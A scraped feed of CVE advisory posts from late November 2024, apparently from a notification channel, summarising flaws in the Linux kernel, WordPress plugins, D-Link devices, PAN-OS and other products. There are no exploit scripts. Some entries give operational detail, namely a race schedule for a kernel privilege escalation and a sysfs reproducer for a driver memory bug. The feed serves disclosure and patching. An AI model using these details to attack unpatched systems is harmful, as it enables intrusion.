🚨 CVE-2024-50066In the Linux kernel, the following vulnerability has been resolved:mm/mremap: fix move_normal_pmd/retract_page_tables raceIn mremap(), move_page_tables() looks at the type of the PMD entry and thespecified address range to figure out by which method the next chunk ofpage table entries should be moved.At that point, the mmap_lock is held in write mode, but no rmap locks areheld yet. For PMD entries that point to page tables and are fully coveredby the source address range, move_pgt_entry(NORMAL_PMD, ...) is called,which first takes rmap locks, then does move_normal_pmd(). move_normal_pmd() takes the necessary page table locks at source anddestination, then moves an entire page table from the source to thedestination.The problem is: The rmap locks, which protect against concurrent pagetable removal by retract_page_tables() in the THP code, are only takenafter the PMD entry has been read and it has been decided how to move it. So we can race as follows (with two processes that have mappings of thesame tmpfs file that is stored on a tmpfs mount with huge=advise); notethat process A accesses page tables through the MM while process B does itthrough the file rmap:process A process B========= =========mremap mremap_to move_vma move_page_tables get_old_pmd alloc_new_pmd *** PREEMPT *** madvise(MADV_COLLAPSE) do_madvise madvise_walk_vmas madvise_vma_behavior madvise_collapse hpage_collapse_scan_file collapse_file retract_page_tables i_mmap_lock_read(mapping) pmdp_collapse_flush i_mmap_unlock_read(mapping) move_pgt_entry(NORMAL_PMD, ...) take_rmap_locks move_normal_pmd drop_rmap_locksWhen this happens, move_normal_pmd() can end up creating bogus PMD entriesin the line `pmd_populate(mm, new_pmd, pmd_pgtable(pmd))`. The effectdepends on arch-specific and machine-specific details; on x86, you can endup with physical page 0 mapped as a page table, which is likelyexploitable for user->kernel privilege escalation.Fix the race by letting process B recheck that the PMD still points to apage table after the rmap locks have been taken. Otherwise, we bail andlet the caller fall back to the PTE-level copying path, which will thenbail immediately at the pmd_none() check.Bug reachability: Reaching this bug requires that you can createshmem/file THP mappings - anonymous THP uses different code that doesn'tzap stuff under rmap locks. File THP is gated on an experimental configflag (CONFIG_READ_ONLY_THP_FOR_FS), so on normal distro kernels you needshmem THP to hit this bug. As far as I know, getting shmem THP normallyrequires that you can mount your own tmpfs with the right mount flags,which would require creating your own user+mount namespace; though I don'tknow if some distros maybe enable shmem THP by default or something likethat.Bug impact: This issue can likely be used for user->kernel privilegeescalation when it is reachable.🎖@cveNotify |
|
| 2024-11-25 15:39:02 |
🚨 CVE-2023-51626D-Link DCS-8300LHV2 RTSP ValidateAuthorizationHeader Username Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DCS-8300LHV2 IP cameras. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of the Authorization header by the RTSP server, which listens on TCP port 554. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21320.🎖@cveNotify |
|
| 2024-11-25 15:39:01 |
🚨 CVE-2023-51625D-Link DCS-8300LHV2 ONVIF SetSystemDateAndTime Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DCS-8300LHV2 IP cameras. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.The specific flaw exists within the implementation of the ONVIF API, which listens on TCP port 80. When parsing the sch:TZ XML element, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21319.🎖@cveNotify |
|
| 2024-11-25 14:38:37 |
🚨 CVE-2024-52392Cross-Site Request Forgery (CSRF) vulnerability in W3speedster W3SPEEDSTER.This issue affects W3SPEEDSTER: from n/a through 7.25.🎖@cveNotify |
|
| 2024-11-25 14:38:36 |
🚨 CVE-2023-5989An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Uyumsoft Information System and Technologies' LioXERP allows an authenticated user to execute Stored XSS.This issue affects LioXERP: before v.146.🎖@cveNotify |
|
| 2024-11-25 14:07:44 |
🚨 CVE-2024-53074In the Linux kernel, the following vulnerability has been resolved:wifi: iwlwifi: mvm: don't leak a link on AP removalRelease the link mapping resource in AP removal. This impacted devicesthat do not support the MLD API (9260 and down).On those devices, we couldn't start the AP again after the AP has beenalready started and stopped.🎖@cveNotify |
|
| 2024-11-25 14:07:43 |
🚨 CVE-2024-0022In multiple functions of CompanionDeviceManagerService.java, there is a possible launch NotificationAccessConfirmationActivity of another user profile due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-11-25 09:39:19 |
🚨 CVE-2024-11664A vulnerability, which was classified as critical, has been found in eNMS up to 4.2. Affected by this issue is the function multiselect_filtering of the file eNMS/controller.py of the component TGZ File Handler. The manipulation leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The patch is identified as 22b0b443acca740fc83b5544165c1f53eff3f529. It is recommended to apply a patch to fix this issue.🎖@cveNotify |
|
| 2024-11-25 09:39:12 |
🚨 CVE-2021-23282Eaton Intelligent Power Manager (IPM) prior to 1.70 is vulnerable to stored Cross site scripting. Thevulnerability exists due to insufficient validation of input from certain resources by the IPM software.The attacker would need access to the local Subnet and an administrator interaction to compromisethe system🎖@cveNotify |
|
| 2024-11-25 09:39:11 |
🚨 CVE-2024-0564A flaw was found in the Linux kernel's memory deduplication mechanism. The max page sharing of Kernel Samepage Merging (KSM), added in Linux kernel version 4.4.0-96.119, can create a side channel. When the attacker and the victim share the same host and the default setting of KSM is "max page sharing=256", it is possible for the attacker to time the unmap to merge with the victim's page. The unmapping time depends on whether it merges with the victim's page and additional physical pages are created beyond the KSM's "max page share". Through these operations, the attacker can leak the victim's page.🎖@cveNotify |
|
| 2024-11-25 06:38:16 |
🚨 CVE-2024-7056The WPForms WordPress plugin before 1.9.1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as Admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-11-25 06:38:10 |
🚨 CVE-2024-6393The Photo Gallery, Sliders, Proofing and WordPress plugin before 3.59.5 does not sanitise and escape some of its Images settings, which could allow high privilege users such as Admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-11-25 06:38:09 |
🚨 CVE-2024-10710The YaDisk Files WordPress plugin through 1.2.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-11-25 06:38:08 |
🚨 CVE-2024-10709The YaDisk Files WordPress plugin through 1.2.5 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2024-11-25 00:40:00 |
🚨 CVE-2024-53916In OpenStack Neutron through 25.0.0, neutron/extensions/tagging.py can use an incorrect ID during policy enforcement. NOTE: 935883 has the "Work in Progress" status as of 2024-11-24.🎖@cveNotify |
|
| 2024-11-25 00:39:59 |
🚨 CVE-2024-10041A vulnerability was found in PAM. The secret information is stored in memory, where the attacker can trigger the victim program to execute by sending characters to its standard input (stdin). As this occurs, the attacker can train the branch predictor to execute an ROP chain speculatively. This flaw could result in leaked passwords, such as those found in /etc/shadow while performing authentications.🎖@cveNotify |
|
| 2024-11-24 23:38:08 |
🚨 CVE-2024-11665Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in hardy-barth cph2_echarge_firmware allows OS Command Injection.This issue affects cph2_echarge_firmware: through 2.0.4.🎖@cveNotify |
|
| 2024-11-24 23:38:07 |
🚨 CVE-2024-9902A flaw was found in Ansible. The ansible-core `user` module can allow an unprivileged user to silently create or replace the contents of any file on any system path and take ownership of it when a privileged user executes the `user` module against the unprivileged user's home directory. If the unprivileged user has traversal permissions on the directory containing the exploited target file, they retain full control over the contents of the file as its owner.🎖@cveNotify |
|
| 2024-11-24 21:37:32 |
🚨 CVE-2024-53914An issue was discovered in the server in Veritas Enterprise Vault before 15.2, ZDI-CAN-24344. It allows remote attackers to execute arbitrary code because untrusted data, received on a .NET Remoting TCP port, is deserialized.🎖@cveNotify |
|
| 2024-11-24 21:37:25 |
🚨 CVE-2024-53910An issue was discovered in the server in Veritas Enterprise Vault before 15.2, ZDI-CAN-24336. It allows remote attackers to execute arbitrary code because untrusted data, received on a .NET Remoting TCP port, is deserialized.🎖@cveNotify |
|
| 2024-11-24 21:37:24 |
🚨 CVE-2024-53909An issue was discovered in the server in Veritas Enterprise Vault before 15.2, ZDI-CAN-24334. It allows remote attackers to execute arbitrary code because untrusted data, received on a .NET Remoting TCP port, is deserialized.🎖@cveNotify |
|
| 2024-11-24 20:37:31 |
🚨 CVE-2024-9676A vulnerability was found in Podman, Buildah, and CRI-O. A symlink traversal vulnerability in the containers/storage library can cause Podman, Buildah, and CRI-O to hang and result in a denial of service via OOM kill when running a malicious image using an automatically assigned user namespace (`--userns=auto` in Podman and Buildah). The containers/storage library will read /etc/passwd inside the container, but does not properly validate if that file is a symlink, which can be used to cause the library to read an arbitrary file on the host.🎖@cveNotify |
|
| 2024-11-24 19:37:46 |
🚨 CVE-2024-7923An authentication bypass vulnerability has been identified in Pulpcore when deployed with Gunicorn versions prior to 22.0, due to the puppet-pulpcore configuration. This issue arises from Apache's mod_proxy not properly unsetting headers because of restrictions on underscores in HTTP headers, allowing authentication through a malformed header. This flaw impacts all active Satellite deployments (6.13, 6.14 and 6.15) which are using Pulpcore version 3.0+ and could potentially enable unauthorized users to gain administrative access.🎖@cveNotify |
|
| 2024-11-24 17:38:17 |
🚨 CVE-2024-2698A vulnerability was found in FreeIPA in how the initial implementation of MS-SFU by MIT Kerberos was missing a condition for granting the "forwardable" flag on S4U2Self tickets. Fixing this mistake required adding a special case for the check_allowed_to_delegate() function: If the target service argument is NULL, then it means the KDC is probing for general constrained delegation rules and not checking a specific S4U2Proxy request.In FreeIPA 4.11.0, the behavior of ipadb_match_acl() was modified to match the changes from upstream MIT Kerberos 1.20. However, a mistake resulting in this mechanism applies in cases where the target service argument is set AND where it is unset. This results in S4U2Proxy requests being accepted regardless of whether or not there is a matching service delegation rule.🎖@cveNotify |
|
| 2024-11-24 16:37:35 |
🚨 CVE-2023-3758A race condition flaw was found in sssd where the GPO policy is not consistently applied for authenticated users. This may lead to improper authorization issues, granting or denying access to resources inappropriately.🎖@cveNotify |
|
| 2024-11-24 15:37:56 |
🚨 CVE-2024-0012An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474 https://security.paloaltonetworks.com/CVE-2024-9474 .The risk of this issue is greatly reduced if you secure access to the management web interface by restricting access to only trusted internal IP addresses according to our recommended best practice deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 .This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, PAN-OS 11.1, and PAN-OS 11.2 software.Cloud NGFW and Prisma Access are not impacted by this vulnerability.🎖@cveNotify |
|
| 2024-11-24 15:37:55 |
🚨 CVE-2024-11068The D-Link DSL6740C modem has an Incorrect Use of Privileged APIs vulnerability, allowing unauthenticated remote attackers to modify any user’s password by leveraging the API, thereby granting access to Web, SSH, and Telnet services using that user’s account.🎖@cveNotify |
|
| 2024-11-24 15:37:51 |
🚨 CVE-2024-11066The D-Link DSL6740C modem has an OS Command Injection vulnerability, allowing remote attackers with administrator privileges to inject and execute arbitrary system commands through the specific web page.🎖@cveNotify |
|
| 2024-11-24 15:37:50 |
🚨 CVE-2021-22763A CWE-640: Weak Password Recovery Mechanism for Forgotten Password vulnerability exists in PowerLogic PM55xx, PowerLogic PM8ECC, PowerLogic EGX100 and PowerLogic EGX300 (see security notification for version infromation) that could allow an attacker administrator level access to a device.🎖@cveNotify |
|
| 2024-11-24 14:37:42 |
🚨 CVE-2024-1753A flaw was found in Buildah (and subsequently Podman Build) which allows containers to mount arbitrary locations on the host filesystem into build containers. A malicious Containerfile can use a dummy image with a symbolic link to the root filesystem as a mount source and cause the mount operation to mount the host root filesystem inside the RUN step. The commands inside the RUN step will then have read-write access to the host filesystem, allowing for full container escape at build time.🎖@cveNotify |
|
| 2024-11-24 12:38:06 |
🚨 CVE-2023-41175A vulnerability was found in libtiff due to multiple potential integer overflows in raw2tiff.c. This flaw allows remote attackers to cause a denial of service or possibly execute an arbitrary code via a crafted tiff image, which triggers a heap-based buffer overflow.🎖@cveNotify |
|
| 2024-11-24 02:38:47 |
🚨 CVE-2024-11233In PHP versions 8.1.* before 8.1.31, 8.2.* before 8.2.26, 8.3.* before 8.3.14, due to an error in convert.quoted-printable-decode filter certain data can lead to buffer overread by one byte, which can in certain circumstances lead to crashes or disclose content of other memory areas.🎖@cveNotify |
|
| 2024-11-23 21:37:42 |
🚨 CVE-2024-39710Argument injection in Ivanti Connect Secure before version 22.7R2.1 and 9.1R18.7 and Ivanti Policy Secure before version 22.7R1.1 and 9.1R18.7 allows a remote authenticated attacker with admin privileges to achieve remote code execution.🎖@cveNotify |
|
| 2024-11-23 21:37:35 |
🚨 CVE-2024-38649An out-of-bounds write in IPsec of Ivanti Connect Secure before version 22.7R2.1(Not Applicable to 9.1Rx) allows a remote unauthenticated attacker to cause a denial of service.🎖@cveNotify |
|
| 2024-11-23 21:37:34 |
🚨 CVE-2024-52533gio/gsocks4aproxy.c in GNOME GLib before 2.82.1 has an off-by-one error and resultant buffer overflow because SOCKS4_CONN_MSG_LEN is not sufficient for a trailing '\0' character.🎖@cveNotify |
|
| 2024-11-23 14:37:39 |
🚨 CVE-2024-35160IBM Watson Query on Cloud Pak for Data 1.8, 2.0, 2.1, 2.2 and IBM Db2 Big SQL on Cloud Pak for Data 7.3, 7.4, 7.5, and 7.6 could allow an authenticated user to obtain sensitive information due to insufficient session expiration.🎖@cveNotify |
|
| 2024-11-23 14:37:38 |
🚨 CVE-2024-11632A vulnerability was found in code-projects Simple Car Rental System 1.0. It has been classified as critical. Affected is an unknown function of the file /book_car.php. The manipulation of the argument fname/id_no/gender/email/phone/location leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter "fname" to be affected. Further analysis indicates that other arguments might be affected as well.🎖@cveNotify |
|
| 2024-11-23 13:38:19 |
🚨 CVE-2023-7299A vulnerability was found in DataGear up to 4.60. It has been declared as critical. This vulnerability affects unknown code of the file /dataSet/resolveSql. The manipulation of the argument sql leads to sql injection. The attack can be initiated remotely. Upgrading to version 4.7.0 is able to address this issue. It is recommended to upgrade the affected component.🎖@cveNotify |
|
| 2024-11-23 12:37:59 |
🚨 CVE-2024-11231The 우커머스 네이버페이 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mnp_purchase shortcode in all versions up to, and including, 3.3.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-11-23 12:37:58 |
🚨 CVE-2024-11034The The Request a Quote for WooCommerce and Elementor – Get a Quote Button – Product Enquiry Form Popup – Product Quotation plugin for WordPress is vulnerable to arbitrary shortcode execution via fire_contact_form AJAX action in all versions up to, and including, 1.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.🎖@cveNotify |
|
| 2024-11-23 08:37:49 |
🚨 CVE-2024-9942The WPGYM - Wordpress Gym Management System plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the MJ_gmgt_user_avatar_image_upload() function in all versions up to, and including, 67.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-11-23 08:37:44 |
🚨 CVE-2024-9660The School Management System for Wordpress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the mj_smgt_load_documets_new() and mj_smgt_load_documets() functions in all versions up to, and including, 91.5.0. This makes it possible for authenticated attackers, with Student-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-11-23 08:37:43 |
🚨 CVE-2024-10803The MP3 Sticky Player plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 8.0 via the content/downloader.php file. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. Please note the vendor released the patched version as the same version as the affected version.🎖@cveNotify |
|
| 2024-11-23 07:37:57 |
🚨 CVE-2024-11330The Custom CSS, JS & PHP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.3.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-11-23 05:39:49 |
🚨 CVE-2024-11387The Easy Liveblogs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'elb_liveblog' shortcode in all versions up to, and including, 2.3.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-11-23 05:39:44 |
🚨 CVE-2024-11332The HIPAA Compliant Forms with Drag’n’Drop HIPAA Form Builder. Sign HIPAA documents plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'hipaatizer' shortcode in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-11-23 05:39:43 |
🚨 CVE-2024-10606The WP Travel Engine – Tour Booking Plugin – Tour Operator Software plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpte_onboard_save_function_callback() function in all versions up to, and including, 6.2.1. This makes it possible for authenticated attackers, with contributor-level access and above, to modify several settings that could have an impact such as lost revenue and page updates.🎖@cveNotify |
|
| 2024-11-23 04:37:49 |
🚨 CVE-2024-10961The Social Login plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.9.0. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.🎖@cveNotify |
|
| 2024-11-23 04:37:43 |
🚨 CVE-2024-10886The Tribute Testimonials – WordPress Testimonial Grid/Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tribute_testimonials_slider' shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-11-23 04:37:42 |
🚨 CVE-2024-10868The Enter Addons – Ultimate Template Builder for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.1.9 via the Advanced Tabs widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.🎖@cveNotify |
|
| 2024-11-23 04:37:41 |
🚨 CVE-2024-10813The Product Table for WooCommerce by CodeAstrology (wooproducttable.com) plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.1 via the var_dump_table parameter. This makes it possible for unauthenticated attackers var data.🎖@cveNotify |
|
| 2024-11-23 04:37:37 |
🚨 CVE-2024-10216The WP User Manager – User Profile Builder & Membership plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'add_sidebar' and 'remove_sidebar' functions in all versions up to, and including, 2.9.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to add or remove a Carbon Fields custom sidebar if the Carbon Fields (carbon-fields) plugin is installed.🎖@cveNotify |
|
| 2024-11-23 04:37:36 |
🚨 CVE-2023-40660A flaw was found in OpenSC packages that allow a potential PIN bypass. When a token/card is authenticated by one process, it can perform cryptographic operations in other processes when an empty zero-length pin is passed. This issue poses a security risk, particularly for OS logon/screen unlock and for small, permanently connected tokens to computers. Additionally, the token can internally track login status. This flaw allows an attacker to gain unauthorized access, carry out malicious actions, or compromise the system without the user's awareness.🎖@cveNotify |
|
| 2024-11-23 01:07:39 |
🚨 CVE-2024-51208File Upload vulnerability in change-image.php in Anuj Kumar's Boat Booking System version 1.0 allows local attackers to upload a malicious PHP script via the Image Upload Mechanism parameter.🎖@cveNotify |
|
| 2024-11-23 01:07:34 |
🚨 CVE-2024-6698The FundEngine plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.7.0. This is due to the plugin not properly verifying user meta updated through the update_user_meta function. This makes it possible for authenticated attackers, with subscriber-level access and above, to update their user meta which can be leveraged to update their capabilities to gain administrator access.🎖@cveNotify |
|
| 2024-11-23 01:07:33 |
🚨 CVE-2024-5924Dropbox Desktop Folder Sharing Mark-of-the-Web Bypass Vulnerability. This vulnerability allows remote attackers to bypass the Mark-of-the-Web protection mechanism on affected installations of Dropbox Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of shared folders. When syncing files from a shared folder belonging to an untrusted account, the Dropbox desktop application does not apply the Mark-of-the-Web to the local files. An attacker can leverage this vulnerability to execute arbitrary code in the context of the current user. Was ZDI-CAN-23991.🎖@cveNotify |
|
| 2024-11-22 22:39:52 |
🚨 CVE-2024-6819IrfanView PSP File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of PSP files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23219.🎖@cveNotify |
|
| 2024-11-22 22:39:45 |
🚨 CVE-2024-11394Hugging Face Transformers Trax Model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of model files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25012.🎖@cveNotify |
|
| 2024-11-22 22:39:44 |
🚨 CVE-2024-11392Hugging Face Transformers MobileViTV2 Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of configuration files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-24322.🎖@cveNotify |
|
| 2024-11-22 22:39:40 |
🚨 CVE-2018-9419In l2cble_process_sig_cmd of l2c_ble.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-11-22 22:39:39 |
🚨 CVE-2024-53076In the Linux kernel, the following vulnerability has been resolved:iio: gts-helper: Fix memory leaks for the error path of iio_gts_build_avail_scale_table()If per_time_scales[i] or per_time_gains[i] kcalloc fails in the for loopof iio_gts_build_avail_scale_table(), the err_free_out will fail to callkfree() each time when i is reduced to 0, so all the per_time_scales[0]and per_time_gains[0] will not be freed, which will cause memory leaks.Fix it by checking if i >= 0.🎖@cveNotify |
|
| 2024-11-22 22:39:34 |
🚨 CVE-2024-53043In the Linux kernel, the following vulnerability has been resolved:mctp i2c: handle NULL header addressdaddr can be NULL if there is no neighbour table entry present,in that case the tx packet should be dropped.saddr will usually be set by MCTP core, but check for NULL in case apacket is transmitted by a different protocol.🎖@cveNotify |
|
| 2024-11-22 22:39:33 |
🚨 CVE-2024-25991In acpm_tmu_ipc_handler of tmu_plugin.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-11-22 21:09:13 |
🚨 CVE-2024-11588A vulnerability was found in AVL-DiTEST-DiagDev libdoip 1.0.0. It has been rated as problematic. This issue affects the function DoIPConnection::reactOnReceivedTcpMessage of the file DoIPConnection.cpp. The manipulation leads to null pointer dereference.🎖@cveNotify |
|
| 2024-11-22 21:09:12 |
🚨 CVE-2024-50158In the Linux kernel, the following vulnerability has been resolved:RDMA/bnxt_re: Fix out of bound checkDriver exports pacing stats only on GenP5 and P7 adapters. But whileparsing the pacing stats, driver has a check for "rdev->dbr_pacing". Thiscaused a trace when KASAN is enabled.BUG: KASAN: slab-out-of-bounds in bnxt_re_get_hw_stats+0x2b6a/0x2e00 [bnxt_re]Write of size 8 at addr ffff8885942a6340 by task modprobe/4809🎖@cveNotify |
|
| 2024-11-22 20:37:47 |
🚨 CVE-2024-30861netentsec NS-ASG 6.3 is vulnerable to SQL Injection via /admin/configguide/ipsec_guide_1.php.🎖@cveNotify |
|
| 2024-11-22 20:08:08 |
🚨 CVE-2024-20537A vulnerability in the web-based management interface of Cisco ISE could allow an authenticated, remote attacker to bypass the authorization mechanisms for specific administrative functions.This vulnerability is due to a lack of server-side validation of Administrator permissions. An attacker could exploit this vulnerability by submitting a crafted HTTP request to an affected system. A successful exploit could allow the attacker to conduct administrative functions beyond their intended access level. To exploit this vulnerability, an attacker would need Read-Only Administrator credentials.🎖@cveNotify |
|
| 2024-11-22 20:08:07 |
🚨 CVE-2024-1309Uncontrolled Resource Consumption vulnerability in Honeywell Niagara Framework on Windows, Linux, QNX allows Content Spoofing.This issue affects Niagara Framework: before Niagara AX 3.8.1, before Niagara 4.1.🎖@cveNotify |
|
| 2024-11-22 19:37:33 |
🚨 CVE-2024-40750Linksys Velop Pro 6E 1.0.8 MX6200_1.0.8.215731 and 7 1.0.10.215314 devices send cleartext Wi-Fi passwords over the public Internet during app-based installation.🎖@cveNotify |
|
| 2024-11-22 19:37:27 |
🚨 CVE-2024-32923there is a possible cellular denial of service due to a logic error in the code. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-11-22 19:37:26 |
🚨 CVE-2024-23240The issue was addressed with improved checks. This issue is fixed in iOS 17.4 and iPadOS 17.4. Shake-to-undo may allow a deleted photo to be re-surfaced without authentication.🎖@cveNotify |
|
| 2024-11-22 19:37:25 |
🚨 CVE-2023-52368Input verification vulnerability in the account module.Successful exploitation of this vulnerability may cause features to perform abnormally.🎖@cveNotify |
|
| 2024-11-22 17:37:53 |
🚨 CVE-2024-50042In the Linux kernel, the following vulnerability has been resolved:ice: Fix increasing MSI-X on VFIncreasing MSI-X value on a VF leads to invalid memory operations. Thisis caused by not reallocating some arrays.Reproducer: modprobe ice echo 0 > /sys/bus/pci/devices/$PF_PCI/sriov_drivers_autoprobe echo 1 > /sys/bus/pci/devices/$PF_PCI/sriov_numvfs echo 17 > /sys/bus/pci/devices/$VF0_PCI/sriov_vf_msix_countDefault MSI-X is 16, so 17 and above triggers this issue.KASAN reports: BUG: KASAN: slab-out-of-bounds in ice_vsi_alloc_ring_stats+0x38d/0x4b0 [ice] Read of size 8 at addr ffff8888b937d180 by task bash/28433 (...) Call Trace: (...) ? ice_vsi_alloc_ring_stats+0x38d/0x4b0 [ice] kasan_report+0xed/0x120 ? ice_vsi_alloc_ring_stats+0x38d/0x4b0 [ice] ice_vsi_alloc_ring_stats+0x38d/0x4b0 [ice] ice_vsi_cfg_def+0x3360/0x4770 [ice] ? mutex_unlock+0x83/0xd0 ? __pfx_ice_vsi_cfg_def+0x10/0x10 [ice] ? __pfx_ice_remove_vsi_lkup_fltr+0x10/0x10 [ice] ice_vsi_cfg+0x7f/0x3b0 [ice] ice_vf_reconfig_vsi+0x114/0x210 [ice] ice_sriov_set_msix_vec_count+0x3d0/0x960 [ice] sriov_vf_msix_count_store+0x21c/0x300 (...) Allocated by task 28201: (...) ice_vsi_cfg_def+0x1c8e/0x4770 [ice] ice_vsi_cfg+0x7f/0x3b0 [ice] ice_vsi_setup+0x179/0xa30 [ice] ice_sriov_configure+0xcaa/0x1520 [ice] sriov_numvfs_store+0x212/0x390 (...)To fix it, use ice_vsi_rebuild() instead of ice_vf_reconfig_vsi(). Thiscauses the required arrays to be reallocated taking the new queue countinto account (ice_vsi_realloc_stat_arrays()). Set req_txq and req_rxqbefore ice_vsi_rebuild(), so that realloc uses the newly set queuecount.Additionally, ice_vsi_rebuild() does not remove VSI filters(ice_fltr_remove_all()), so ice_vf_init_host_cfg() is no longernecessary.🎖@cveNotify |
|
| 2024-11-22 17:37:52 |
🚨 CVE-2023-36258An issue in LangChain before 0.0.236 allows an attacker to execute arbitrary code because Python code with os.system, exec, or eval can be used.🎖@cveNotify |
|
| 2024-11-22 16:39:29 |
🚨 CVE-2024-37664Redmi router RB03 v1.0.57 is vulnerable to TCP DoS or hijacking attacks. An attacker in the same WLAN as the victim can disconnect or hijack the traffic between the victim and any remote server by sending out forged TCP RST messages to evict NAT mappings in the router.🎖@cveNotify |
|
| 2024-11-22 16:39:22 |
🚨 CVE-2024-32394An issue in ruijie.com/cn RG-RSR10-01G-T(WA)-S RSR_3.0(1)B9P2_RSR10-01G-TW-S_07150910 and RG-RSR10-01G-T(WA)-S RSR_3.0(1)B9P2_RSR10-01G-TW-S_07150910 allows a remote attacker to execute arbitrary code via a crafted HTTP request.🎖@cveNotify |
|
